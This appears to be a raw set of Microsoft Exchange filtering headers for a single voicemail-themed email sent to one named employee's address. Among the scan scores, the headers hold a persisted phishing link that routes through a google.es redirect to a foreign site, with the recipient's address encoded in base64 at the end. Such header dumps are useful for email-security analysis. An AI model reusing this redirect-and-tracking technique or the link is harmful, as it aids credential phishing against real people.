                                                                X-MS-Exchange-Organization-OriginalTenant-AuthAsAnonymous
                                                                X-MS-Exchange-Organization-OriginalTenant-FromEntityHeaderHybridOnPrem
                                                                X-MS-Exchange-Transport-CrossTenantHeadersStrippedSA2PEPF00002251.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Transport-CrossTenantHeadersPromotedSA2PEPF00002251.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-ConnectingIP40.107.247.116
                                                                X-MS-Exchange-Organization-ConnectingEHLOEUR02-AM0-obe.outbound.protection.outlook.com
                                                                X-MS-Exchange-Organization-AS-LastExternalIp40.107.247.116
                                                                X-MS-Exchange-Organization-IsBipIncludedAtpTenanttrue
                                                                X-MS-Exchange-Organization-IsAtpTenanttrue
                                                                X-MS-Exchange-Organization-AntiSpam-ArcTrustedDomainscheckpointcloudsec.com
                                                                X-MS-Exchange-Organization-Originating-CountryNL
                                                                X-MS-Exchange-Organization-OriginalEnvelopeRecipientskelly.swanson@montrose-env.com
                                                                X-MS-Exchange-Organization-PtrDomainsmail-am0eur02on2116.outbound.protection.outlook.com
                                                                X-MS-Exchange-Organization-EhloAndPtrDomainEUR02-AM0-obe.outbound.protection.outlook.com; mail-am0eur02on2116.outbound.protection.outlook.com
                                                                X-MS-Exchange-Organization-MxPointsToUstrue
                                                                X-MS-Exchange-Organization-RecipientDomainMxRecord-PFAFDmontrose-env.com#montroseenv-com02b.mail.protection.outlook.com
                                                                X-MS-Exchange-Organization-RecipientDomainMxInfomontrose-env.com#Office365#montroseenv-com02b.mail.protection.outlook.com
                                                                X-MS-Exchange-Organization-CompAuthRespass
                                                                X-MS-Exchange-Organization-CompAuthReason100
                                                                X-MS-Exchange-Organization-SpoofDetection-Frontdoor-DisplayDomainNamegenerous-minds.com
                                                                X-MS-Exchange-Organization-SenderRep-Score5
                                                                X-MS-Exchange-Organization-SenderRep-DataIpClassLargeGrayOther_GrayOther_SmallGrayOther
                                                                X-MS-Exchange-Organization-VBR-ClassGrayOther
                                                                X-MS-Exchange-Organization-HMATPModel-Spf1
                                                                X-MS-Exchange-Organization-HMATPModel-Recipient<PII:H100055(Zau5Zpy6qEWbUrJisQKW+Ajm7drlik0oN1OxhvuYO2g=)>@montrose-env.com
                                                                X-MS-Exchange-Organization-TransportTrafficTypeEmail
                                                                X-MS-Exchange-Organization-TransportTrafficSubType
                                                                X-MS-PublicTrafficTypeEmail
                                                                X-MS-Exchange-Organization-OrderedPrecisionLatencyInProgressLSRV=BL0PR0901CA0028.namprd09.prod.outlook.com:TOTAL-FE=0.216|SMR-PEN=0.216(RENV=0.214); 2024-11-15T18:28:37.645Z
                                                                X-MS-Exchange-Organization-MessageLatencySRV=BL0PR0901CA0028.namprd09.prod.outlook.com:TOTAL-FE=0.425|SMR-PEN=0.425(RENV=0.214|SMRPROXY-PEN=0.209(SMSC=0.136|SMS-PEN=0.073))
                                                                X-MS-Exchange-Forest-ArrivalHubServerSJ0PR09MB11746.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-AuthSourceSA2PEPF00002251.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-AuthAsAnonymous
                                                                X-MS-Exchange-Organization-FromEntityHeaderInternet
                                                                X-MS-Exchange-Organization-MessageScopecfa23dee-c63e-4018-a908-33fd0686894c
                                                                X-MS-Exchange-Forest-MessageScopecfa23dee-c63e-4018-a908-33fd0686894c
                                                                X-MS-Exchange-Organization-Antispam-ProtocolFilterHub-ScanContextProtocolFilterHub:SmtpOnEndOfData;
                                                                X-MS-Office365-Filtering-Correlation-Id-Prvs2a2328df-bdc3-4a84-7f0c-08dd05a34875
                                                                X-MS-Exchange-Organization-P2SenderDisplayNamePIIH100055(g0rqra/nkf8Kd2tpjMppDdG+n3CJOpHCR2fptHV5FxA=)
                                                                X-MS-Exchange-Organization-P2SenderPII<PII:H100055(FlWml3KlDCf/DyULONqE+txwmt7WItOAY7cR5BERycg=)>@generous-minds.com
                                                                X-MS-Exchange-Organization-Auth-DmarcStatusPass
                                                                X-MS-Exchange-Organization-VerifiedDkimDomainsListgenerousminds.onmicrosoft.com
                                                                X-MS-Exchange-Organization-Antispam-AuthResults{"SpfDomain":"generous-minds.com", "SpfAuthStatus":"Pass", "DkimDomain":"generousminds.onmicrosoft.com", "DkimAuthStatus":"Pass", "DkimSubStatus":"None", "DmarcAuthStatus":"Pass", "DmarcAction":"None", "ArcAuthStatus":"2", "ArcSubStatus":"0"}
                                                                X-MS-Exchange-Organization-PFAHub-Total-Message-Size143210
                                                                X-MS-Exchange-Organization-OriginalSize143210
                                                                X-MS-Exchange-Organization-HygienePolicyPremium
                                                                X-MS-Exchange-Organization-ReplicationInfoReplicaId=c5b5dc19-460f-44c3-1045-7b52a305dd08; ReplicatingServerFqdn=PH0PR09MB11757.namprd09.prod.outlook.com
                                                                X-MS-Exchange-Organization-PhishSim-Rules-Execution-History225c5842-f453-4d69-93d1-5592be3f6e44
                                                                X-MS-Exchange-Organization-Antispam-PreContentFilter-PolicyLoadTimePSOSUB:151; PSOSUBLOAD:148; PSOSUBRUN:1; PSOSUBCOUNT:1; SMORES:71; SMORESLOAD:69; SMORESRUN:0; SMORESCOUNT:0; SAORES:147; SAORESLOAD:72; SAORESRUN:0; SAORESCOUNT:1; SLORES:76; APORES:146; APORESLOAD:73; RSORES:73; SLORESLOAD:72; SLORESRUN:0; SLORESCOUNT:1;
                                                                X-MS-Exchange-Organization-MessageFingerprintD5DDD02C.C22ADC8.ADCB3E2.C0EBC0AB.201F4
                                                                X-MS-Exchange-Organization-ExtractedBarcode
                                                                X-MS-Exchange-Organization-AttachmentDetailsInfo-ChunkCount1
                                                                X-MS-Exchange-Organization-AttachmentDetailsInfo-0[{"ID":0, "FS":82368, "SHA256":"344938f2e50ce50316a1400fd8965085dd859889721d47756645e6ca532e895d", "HFH":"NEk48uUM5QMWoUAP2JZQhd2FmIlyHUd1ZkXmylMuiV0=", "FE":"png", "AF":2048, "AFT":"{784:\"jeminiqw2.png\", 789:\"png\"}", "AFT2":"{784:\"jeminiqw2.png\", 789:\"png\", 2919:1120, 2920:540, 2921:32, 2923:1, 2934:\"png\"}", "FPR":{"IF0":"IF0_00FF05FFF1182F1007FFFF1A7FFBBA007FFFF55"}}, {"ID":1, "FS":0, "FE":"", "AF":0, "AFT":"{784:\"ilil.pdf\"}", "AFT2":"{784:\"ilil.pdf\", 3147:1}"}]
                                                                X-MS-Exchange-Organization-URLFeatureReduction17; 2; 0; 13; 0; 0; 0; 0; 9; 2; 1; 89; 0; 0; 0; 1; 0; 0
                                                                X-MS-Exchange-Organization-Persisted-Urls-ChunkCount5
                                                                X-MS-Exchange-Organization-Persisted-Urls-0[{"ID":1, "OU":"https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t", "U":"https://www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnit
                                                                X-MS-Exchange-Organization-Persisted-Urls-1ed%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t", "IAR":false, "LI":{"TN":"a", "IC":true, "BF":2, "SI":-1, "EndIndex":-1}, "SRCI":1, "IU":null, "NU":"www.google.es/url?q=querywbir(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2
                                                                X-MS-Exchange-Organization-Persisted-Urls-2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fcondominioanacarolina.com.br%2flockeq%2fwtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t", "UFT":"{101:17, 102:2, 105:13, 108:3, 110:6, 111:9, 112:2, 114:6, 115:3, 116:1, 118:3, 119:6, 121:4, 122:2, 123:1, 125:2, 128:3, 131:89, 135:\"F538357B, 59CF2A9A, FB1140DA, F224BA67, 5FC87847, 52040AC8\", 142:0, 146:\"google.es\", 205:-1, 206:-1, 207:-1, 208:-1, 209:-1, 210:-1, 211:-1, 212:-1, 213:-1, 214:-1, 215:-1, 216:-1, 217:-1, 218:-1, 219:-1, 220:-1, 221:-1, 222:-1, 223:-1, 224:-1, 225:-1, 226:-1, 227:-1, 228:-1, 229:-1, 230:-1, 231:-1, 232:-1, 233:-1, 234:-1, 235:-1, 236:-1, 237:-1, 238:-1, 239:-1, 240:-1, 241:-1, 242:-1, 243:-1, 244:-1, 245:-1, 246:-1, 247:-1, 248:-1, 249:10, 250:10, 251:11, 252:11}", "UFT2":"{101:17, 102:2, 105:13, 108:3, 110:6, 111:9, 112:2, 114:6, 115:3, 116:1, 118:3, 119:6, 121:4, 122:2, 123:1, 125:2, 128:3, 131:89, 142:0, 146:\"google.es\", 150:1, 153:1, 166:1, 168:1, 180:4, 181:1, 182:1083, 183:4, 188:1, 189:9, 205:-1, 206:-1, 207:-1, 208:-1, 209:-1, 210:-1, 211:-1, 212:-1, 213:-1, 214:-1, 215:-1, 216:-1, 217:-1, 218:-1, 219:-1, 220:-1, 221:-1, 222:-1, 223:-1, 224:-1, 225:-1, 226:-1, 227:-1, 228:-1, 229:-1, 230:-1, 231:-1, 232:-1, 233:-1, 234:-1, 235:-1, 236:-1, 237:-1, 238:-1, 239:-1, 240:-1, 241:-1, 242:-1, 243:-1, 244:-1, 245:-1, 246:-1, 247:-1, 248:-1,249:10,250:10,251:11,252:11,1501:\"-1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; 10; 10; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; 10; 10\",2899:10,2900:10,2901:11,2902:11}","DPD":{"UF":"17
                                                                X-MS-Exchange-Organization-Persisted-Urls-3367296","CH":"6450191611200192869","SCHM":"Https","CNT":"1","MLFP":"UESELV3=20; UEBUFV0=1104","SL":"1","LOG":"1"},"PROC":[]},{"ID":1,"OU":"https://www.google.es/url?q=queryyuoc","U":"https://www.google.es/url?q=queryyuoc","IAR":false,"LI":{"BF":1,"SI":-1,"EndIndex":-1},"SRCI":1,"IU":null,"NU":"www.google.es/url?q=queryyuoc","UFT":"{101:17,102:2,105:13,108:3,110:6,111:9,112:2,114:6,115:3,116:1,118:3,119:6,121:4,122:2,123:1,125:2,128:3,131:89,135:\"F538357B,59CF2A9A,FB1140DA,F224BA67,5FC87847,52040AC8\",142:0,146:\"google.es\",205:-1,206:-1,207:-1,208:-1,209:-1,210:-1,211:-1,212:-1,213:-1,214:-1,215:-1,216:-1,217:-1,218:-1,219:-1,220:-1,221:-1,222:-1,223:-1,224:-1,225:-1,226:-1,227:-1,228:-1,229:-1,230:-1,231:-1,232:-1,233:-1,234:-1,235:-1,236:-1,237:-1,238:-1,239:-1,240:-1,241:-1,242:-1,243:-1,244:-1,245:-1,246:-1,247:-1,248:-1,249:10,250:10,251:11,252:11}","UFT2":"{101:17,102:2,105:13,108:3,110:6,111:9,112:2,114:6,115:3,116:1,118:3,119:6,121:4,122:2,123:1,125:2,128:3,131:89,142:0,146:\"google.es\",150:1,151:1,166:1,180:1,181:1,182:12,183:4,188:1,189:9,205:-1,206:-1,207:-1,208:-1,209:-1,210:-1,211:-1,212:-1,213:-1,214:-1,215:-1,216:-1,217:-1,218:-1,219:-1,220:-1,221:-1,222:-1,223:-1,224:-1,225:-1,226:-1,227:-1,228:-1,229:-1,230:-1,231:-1,232:-1,233:-1,234:-1,235:-1,236:-1,237:-1,238:-1,239:-1,240:-1,241:-1,242:-1,243:-1,244:-1,245:-1,246:-1,247:-1,248:-1,249:10,250:10,251:11,252:11,1501:\"-1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; 10; 10; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; -1; 10; 10\",2899:10,2900:10,2901:11,2902:11}","DPD":{"UF":"18940160","CH":"11610247541619752066","SCHM":"Https","CNT":"1","M
                                                                X-MS-Exchange-Organization-Persisted-Urls-4LFP":"UESELV3=20; UEBUFV0=888","SL":"1","LOG":"1"},"PROC":[]}]
                                                                X-MS-Exchange-Organization-PersistedUrlCount2
                                                                X-MS-Exchange-Organization-FeatureTable{255:11, 256:11, 261:10, 262:10, 341:3, 342:0, 343:1, 344:0, 345:1, 346:0, 347:3, 348:0, 349:1, 350:0, 351:1, 352:0, 353:14, 354:7, 355:13, 356:6, 357:33, 358:8, 382:"173.195.100.199", 383:"cloudfare.com", 384:"generous-minds.com", 385:"generous-minds.com", 386:"True", 387:"True", 421:48, 422:0, 423:48, 424:0, 425:75, 426:7, 427:75, 428:7, 429:89, 430:7, 452:1, 453:1, 454:"40FCF4D@montrose-env.com", 455:"NEI", 457:429, 458:63, 459:217, 460:1671277, 461:209, 462:1231801, 463:209, 464:1231801, 501:1, 502:1, 503:1, 504:1, 506:1, 507:1, 508:"generousminds.onmicrosoft.com", 509:"generous-minds.com", 510:"generous-minds.com", 511:"pass", 512:100, 603:0, 604:0, 651:2, 653:1, 668:0, 669:15, 721:"4.02", 722:"3.3", 723:1, 725:114, 726:3, 728:495, 730:366, 735:"4.01", 738:1, 739:1, 740:1, 741:1, 742:3,743:7,744:1,748:"account; notice; attach; alert; delete; notif; stor",749:"Latn",750:"centene.com",755:710,758:"ECDDD03C.C32ADC8.EDCB32E.C4EB922A.201AB",781:2,782:13,802:1,803:6,804:1,805:1,810:1,811:1,817:1,818:3,819:366,820:6,821:28,822:3764,823:206,824:17,825:2,827:13,832:9,833:2,834:1,838:"html:1; head:1; meta:2; body:1; div:8; p:72; a:6; img:1; br:9; b:21; style:1; o_p:44; span:40; strong:1; hr:1",841:1,844:1,845:0,849:1,850:1,1010:0,1011:"EDAFD3BE; ",1028:5844,1029:5502,1030:23,1031:341,1032:5844,1033:5502,1034:23,1035:341,1051:-1,1052:-1,1053:-1,1054:-1,1101:"0.162",1401:0,1402:0,1403:0,1404:0,1405:0,1406:0,1407:845,1408:901,1409:2598,1410:2676,1411:2598,1412:2676,1413:8,1414:6621897,1417:9,1418:430146155,1423:24,1424:23615729263}
                                                                X-MS-Exchange-Organization-Antispam-PreContentFilter-ScanContextCategorizerOnSubmitted; CategorizerOnResolved;
                                                                X-MS-Exchange-Organization-AVScannedByV2true
                                                                X-MS-Exchange-Organization-AVScanCompletetrue
                                                                X-MS-Exchange-Organization-UrlSelected1
                                                                X-MS-Exchange-Organization-UrlLogged1
                                                                X-MS-Exchange-Organization-OffboxClassificationInfo{"EndpointId":"DCS", "OperationIds":{}, "OperationStates":{}, "Classifiers":[], "RuleInfos":[], "CorrelationId":"13002a4f-0ad5-4fed-a0e0-bd98f435a70c", "TotalClassificationLatency":"00:00:00"}
                                                                X-MS-Exchange-Organization-ExternalRoutingTopologyAnalysis
                                                                X-MS-Exchange-Organization-Recipient-Limit-VerifiedTrue
                                                                X-MS-Exchange-Organization-TotalRecipientCount1
                                                                X-MS-Exchange-Organization-ExternalRecipientCount0
                                                                X-MS-Exchange-Organization-IsSingleRepresentativeTrue
                                                                X-MS-Exchange-Organization-ASDirectionalityType1
                                                                X-MS-Exchange-Organization-HVERecipientsForked1.0
                                                                X-MS-Exchange-Organization-SafeAttachmentPolicyMontrose Environmental Group_SafeAttachments
                                                                X-MS-Exchange-Organization-SafeLinksPolicyMontrose Environmental Group_SafeLinks
                                                                X-MS-Exchange-Organization-SafeAttachmentPolicy-Enable1
                                                                X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForEmail1
                                                                X-MS-Exchange-Organization-SafeLinksPolicy-EnableSafeLinksForInternalSenders1
                                                                X-MS-Exchange-Organization-SenderRecipientCommunicationStateNEI
                                                                X-MS-Exchange-Organization-Boomerang-VerdictNone
                                                                X-MS-Exchange-AtpMessagePropertiesSA|SL
                                                                X-MS-Exchange-Organization-CommunicationStateSummaryNEI
                                                                X-MS-Exchange-Organization-FirstContactSummaryST=2; MRG=0; EXT=0; UN=1; ORCT=1; EV=1; FC=0; NESI=1; NES=0; ESTI=0; EST=0; INS=0; MP=0; UD=0; QE=0; ERR=0
                                                                X-MS-Exchange-Organization-SenderIntelligence-P2SenderOrgDomainTenantId{"stringProperties":{"_STATUS":"Success"}, "numericProperties":{"EntityFound":1}}
                                                                X-MS-Exchange-Organization-Antispam-AnalystFeatureFilter-ScanContextCategorizerOnResolved;
                                                                X-MS-Exchange-Organization-Rules-Execution-History840307d7-f778-4c70-a034-a340d4158cf3%%%3c413034-47db-4e6b-aa64-97b9c0127e20%%%5c98d247-f9f5-4ebd-b36f-b831ca05fd4a%%%1505d861-8e55-4175-ac63-cf4b867c9923%%%e1599244-1ef7-44ce-af49-9e9aed630215%%%8871f4fc-ceda-4805-8477-49ec9738b59d%%%852f0044-a720-400d-947f-d271699e6c76%%%a2dada09-e6db-4574-9859-3955c1899e56%%%b2c5fc93-63ac-465a-85f6-fdce9661c755%%%30538bd7-f3ab-4841-9c1f-91de110279e6%%%5c01f245-e559-4d00-8586-10e45b16d1d2%%%f5bddc86-b6fd-4267-80f0-3c9a5cb9f503
                                                                X-MS-Exchange-Organization-Disclaimer-Hash701c2b241f95b3174788fda1995bba19225f4fc03a97f7214d64c495fd69afd6
                                                                X-MS-Exchange-Organization-Rules-Execution-Loga11f404c-6206-4380-b021-16ffcfcdfb9b
                                                                X-MS-Exchange-Organization-RuleName-Execution-LogTGVnYWwgRGlzY2xhaW1lcg==
                                                                X-MS-Exchange-Forest-RulesExecutedSJ0PR09MB11746
                                                                X-MS-Exchange-Organization-RulesExecutedSJ0PR09MB11746
                                                                X-MS-Exchange-Organization-DlpRules-Execution-Historyd5e0fe8e-cd66-415e-8bc6-ea1e10710488%%%84e94896-f620-462f-b192-36b8ef5c36a6%%%a36dce59-96ef-4f5b-9875-3edc640e8647%%%420edc01-3b29-45f9-9fed-98ac47253c00%%%360d04be-2e66-49ef-8d9b-070005a1a60c%%%1f2635fc-2932-4a08-bdf1-4a05d6d84334%%%ae9e41b0-1e1d-4b70-8063-0234eab4ff6a%%%1e6498aa-3c99-478b-943f-150af2d11730%%%52e853eb-20ed-464f-9070-79fecdd7e72a%%%95054209-e623-44be-93cd-4fc05e2f32f9%%%865988f9-99b1-4994-8396-8e12938e5e2a%%%d5db9455-159e-4ef6-84df-7561e5a986ad%%%9b037508-ad43-4a8d-896d-36ea7e380cef%%%7430f60d-d0ce-42bb-9c8d-743032d57ad6%%%fb234191-4114-4685-91eb-f1e5655cb1cb%%%da1843b1-a77b-4fdd-a798-38ec4e5b4436
                                                                X-MS-Exchange-Organization-DlpRulesExecutedSJ0PR09MB11746
                                                                X-MS-Exchange-Organization-Antispam-ContentFilter-ScanContextCategorizerOnResolved;
                                                                X-MS-Exchange-Organization-CFA-UserOption0
                                                                X-MS-Exchange-Organization-CompAuthcompauth=pass reason=100
                                                                X-MS-Exchange-Organization-ContainsAttachmentstrue
                                                                X-MS-Exchange-Organization-Feature-Long0 201:10363 202:1990 203:1 205:114 206:3 208:495 210:366 215:10351 219:1 220:6 221:1 222:1 227:1 228:1 234:1 235:2 236:1 238:1 239:1 240:1 241:1 242:1 243:3 244:7 245:1 246:1 247:1 248:1 252:1 256:2 257:13 260:3 261:366 262:6 263:28 264:3764 265:206 1006:account; notice; attach; alert; delete; notif; stor 1007:Latn 1008:centene.com 1013:173.195.100.199 1014:generousminds.onmicrosoft.com 1015:generous-minds.com 1019:cloudfare.com 1020:generous-minds.com 1030:generous-minds.com 1034:40FCF4D@montrose-env.com 1035:generous-minds.com
                                                                X-MS-Exchange-Organization-ExtractionTagsSubject[External] - MONTROSE-ENV: You have a Voice Mail (if)
                                                                X-MS-Exchange-Organization-ExtractionTagsFrom"Audio.calls" <rbeuk@generous-minds.com>
                                                                X-MS-Exchange-Organization-ExtractionTagsSubjectNormalizedexternal rnontrose env you have a volce rnall lf
                                                                X-MS-Exchange-Organization-ExtractionTags1IMG;SUB64;
                                                                X-MS-Exchange-Organization-ExtractionTagsURLFoundURL
                                                                X-MS-Exchange-Organization-ATPDetonationContextEmail_EnterpriseATP_Mailflow
                                                                X-MS-Exchange-Organization-Antispam-SpamFilter-ScanContextCategorizerOnResolved;
                                                                X-MS-Exchange-Organization-Antispam-AnalystRuleHits(13230040)(4073199012)(35042699022)(12062699021)(22003199012)(5073199012)(5063199012)(4076899003)(8096899003)
                                                                X-MS-Exchange-Organization-Antispam-ScanContextDIR:Incoming; SFV:NSPM; SKIP:0;
                                                                X-MS-Exchange-Organization-Antispam-PostContentFilter-ScanContextCategorizerOnResolved; CategorizerOnRouted;
                                                                X-MS-Exchange-Organization-SCL1
                                                                X-Microsoft-AntispamBCL:0; ARA:13230040|4073199012|35042699022|12062699021|22003199012|5073199012|5063199012|4076899003|8096899003;
                                                                X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-ChunkCount1
                                                                X-MS-Exchange-Organization-EmailFingerprintsDetailsInfo-0[{"Type":"VA5", "Val":"VA5_35679BBB759096F6ADD50C075CDA94742C0BEBA0C422CCEF7EDFEA0F7D8EACA1", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA4", "Val":"VA4_32098211BEC4F3412D61AD134799A15CB09DBEB2C9305F982C8C21F5530B112E", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA33", "Val":"VA33_AF95782C2AC71E270B4B43D39DA81BA9AF00CC37ABB5DA2101F239A1FFA26551", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA32", "Val":"VA32_CF3BD79EED1636B8ACDA4B58E1D7417E62D22348C94A721E14081AC262236068", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA31", "Val":"VA31_8058BE99423A5EE9C92979FE2D1ED90CC62F1C83649BBB9BC4B063830B629CC1", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA30", "Val":"VA30_1F5639DAFCF8E35E7F687591A1A386957FF77AB6FCD4D0822562711B3E07053E", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA11", "Val":"VA11_BF700B5CA432B5291DDA5E8D07F071C5F43A75A97983C7DCEF934E20D6507461", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA10", "Val":"VA10_B334A70E22C2F7B899AECFBC6B1932FDFB8161B37119D8E0D00E37B418CFED3B", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA61", "Val":"VA61_4B7261ED3058F0FB9947B38E8A3315AED561A7DCA432E2AF700941BF5A497B5A", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA60", "Val":"VA60_1B464C25833D382637CEB0490087E2CA7E216D2E9F178C57767EFE9D5BB8B4AD", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA3", "Val":"VA3_ECDDD03C.C32ADC8.EDCB32E.C4EB922A.32BE2111", "Func":"None", "FF":0, "PD":{}}, {"Type":"VA2", "Val":"VA2_34E3A4EA98750E7AF3212B7E959904BCB40252464F251D84A973CEA012AA772B", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA1", "Val":"VA1_269D4CDD7A97F04CCE851A2058C64BB311746EE00D0A83A7C2A9B8BC7E2946ED", "Func":"SHA256", "FF":0, "PD":{}}, {"Type":"VA0", "Val":"VA0_7C47C2F5F27A2BEF4904A08748E73F4D01FDF78F4F7D0E6EA48D45613C4D1C20", "Func":"SHA256", "FF":0, "PD":{}}]
